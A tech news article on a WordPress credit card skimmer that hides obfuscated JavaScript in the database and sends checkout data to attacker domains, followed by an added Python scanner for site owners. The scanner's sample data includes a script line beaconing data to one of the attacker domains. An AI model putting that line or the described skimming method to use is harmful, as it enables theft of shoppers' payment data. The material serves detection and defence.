
Sophisticated credit card skimmer malware targets WordPress websites


A newly discovered credit card skimmer malware exploits vulnerabilities in WordPress websites to steal sensitive payment information during checkout. By embedding malicious code into the database, the malware silently exfiltrates credit card details and other sensitive data, posing a significant threat to online transactions.

The malicious activity was detected within the WordPress database of a compromised website, specifically in the ‘wp_options’ table. The malware was embedded in the following row:

  • option_name: widget_block
  • option_value: Obfuscated JavaScript code

By hiding within the database rather than in theme files or plugins, the malware evades detection by conventional file-scanning tools. This strategic placement allows it to persist undetected on the infected site.

This credit card skimmer operates with alarming precision. It activates on checkout pages by identifying URLs containing ‘checkout’ while excluding those containing ‘cart’. The script deploys one of two methods to harvest payment data:

  • Fake payment form injection: The malware dynamically creates a fake payment form that mimics legitimate processors such as Stripe. It includes fields for the credit card number, expiration date, CVV, and billing information.
  • Hijacking existing payment fields: In cases where a legitimate payment form already exists, the script captures the data users enter in real time. This ensures compatibility with a variety of payment systems.

Once the visitor enters their details, the malware encodes the information with Base64 and encrypts it with AES-CBC, making the stolen data appear harmless during transmission. It then exfiltrates the data to attacker-controlled domains using the ‘navigator.sendBeacon’ function, so the theft occurs without interrupting the user’s checkout.

As per researchers, the stolen data is sent to the following domains:

  • valhafather[.]xyz
  • fqbe23[.]xyz

Both domains are currently blocklisted on platforms like VirusTotal, and only two websites have been identified as infected so far.
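A defender-side check for the indicators described above (the ‘widget_block’ storage location, the checkout-URL trigger, the ‘navigator.sendBeacon’ exfiltration and the two listed domains), added here as example code that is not from the article or the researchers. The sample rows are constructed to stand in for a ‘wp_options’ export; the scoring weights are assumptions.

```python
import re

# Constructed sample rows standing in for a wp_options export: a benign block
# widget, a row carrying only the skimmer's indicators (not a real payload),
# and an unrelated option.
SAMPLE_WP_OPTIONS = [
    {"option_name": "widget_block",
     "option_value": 'a:1:{i:2;a:1:{s:7:"content";s:20:"<p>Hello, world.</p>";}}'},
    {"option_name": "widget_block",
     "option_value": '<script>if(location.href.indexOf("checkout")>-1){'
                     'var d=btoa("x");navigator.sendBeacon("https://valhafather.xyz/",d)}</script>'},
    {"option_name": "siteurl", "option_value": "https://example.test"},
]

# Indicators drawn from the article, each with an assumed weight.
INDICATORS = {
    r"navigator\.sendBeacon": 3,                          # exfiltration channel
    r"valhafather\.xyz|fqbe23\.xyz": 5,                   # blocklisted domains
    r"<script": 1,                                        # JS inside an option row
    r"checkout": 1,                                       # page-selection trigger
    r"\b(?:atob|btoa|eval|unescape|fromCharCode)\b": 2,   # common obfuscation/encoding
    r"crypto\.subtle|AES-CBC": 2,                         # in-browser encryption of stolen data
}


def score_option_value(value):
    """Return (score, matched patterns) for a single option_value string."""
    score, hits = 0, []
    for pattern, weight in INDICATORS.items():
        if re.search(pattern, value, re.IGNORECASE):
            score += weight
            hits.append(pattern)
    return score, hits


def scan_wp_options(rows, threshold=4):
    """Flag wp_options rows whose value looks like an injected skimmer.

    Every row is scanned, not only widget_block, since file scanners miss
    database-resident code regardless of which option it hides in.
    """
    findings = []
    for row in rows:
        score, hits = score_option_value(row["option_value"])
        if score >= threshold:
            findings.append({"option_name": row["option_name"],
                             "score": score, "hits": hits})
    return findings
```

Run it against a real export by loading the rows from `wp db export` output or a `SELECT option_name, option_value FROM wp_options` query; any flagged row should be inspected by hand before removal.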

Researchers say this malware poses a significant threat by stealing sensitive payment information, including credit card numbers and CVV codes, directly from checkout pages. The attackers can then use this data for fraudulent transactions or sell it on underground markets.

“It [malware] dynamically creates a fake payment form that mimics legitimate payment processors (e.g., Stripe). The form includes fields for credit card number, expiration date, CVV, and billing information. If a legitimate payment form is already on the page, the script captures data entered into these fields in real time,” researchers explained.

What makes this attack particularly insidious is its ability to operate in the background without disrupting the normal checkout process, leaving users completely unaware.

To protect against such threats, WordPress site owners are advised to regularly update all plugins, themes and WordPress core files, apply the latest security patches, use strong passwords, implement two-factor authentication, deploy tools to monitor unauthorised changes to website files and use a Web Application Firewall (WAF) to block malicious traffic and hacking attempts.

Kumar Hemant

Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me
